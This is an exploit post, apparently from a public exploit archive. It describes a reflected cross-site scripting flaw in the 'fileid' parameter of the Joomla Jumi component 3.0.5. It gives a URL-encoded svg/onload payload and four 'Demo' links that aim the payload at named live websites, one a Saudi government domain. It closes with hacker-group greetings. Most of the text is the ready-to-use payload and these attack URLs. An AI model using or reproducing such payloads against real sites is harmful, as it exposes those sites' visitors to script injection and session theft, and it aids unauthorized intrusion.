Joomla Jumi component version 3.0.5 suffers from a cross site scripting vulnerability.
9d450608190199e563b1f951ac8630d6a5352e3eb523628d6f2280d2e95b12c2
######################
# Exploit Title : Joomla Component com_jumi - Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/jumi
# Category: [ Webapps ]
# Tested on: [ Win ]
# Date: 2016/05/26
# Version : 3.0.5
######################
#
# PoC:
# fileid vulnerable to XSS
# Payload = ">Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team
# Demo :
# http://www.ic.gov.sa/index.php?option=com_jumi&view=application&fileid=5%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
# http://www.starfilcas.com/index.php?option=com_jumi&view=application&fileid=3%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&Itemid=223&lang=en
# http://www.ballhockeyone.com/index.php?option=com_jumi&view=application&fileid=47%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&Itemid=252
# http://www.comunico.com/index.php?option=com_jumi&fileid=3%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&Itemid=80&svpage=programs_academic
#
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : persian-team.ir
######################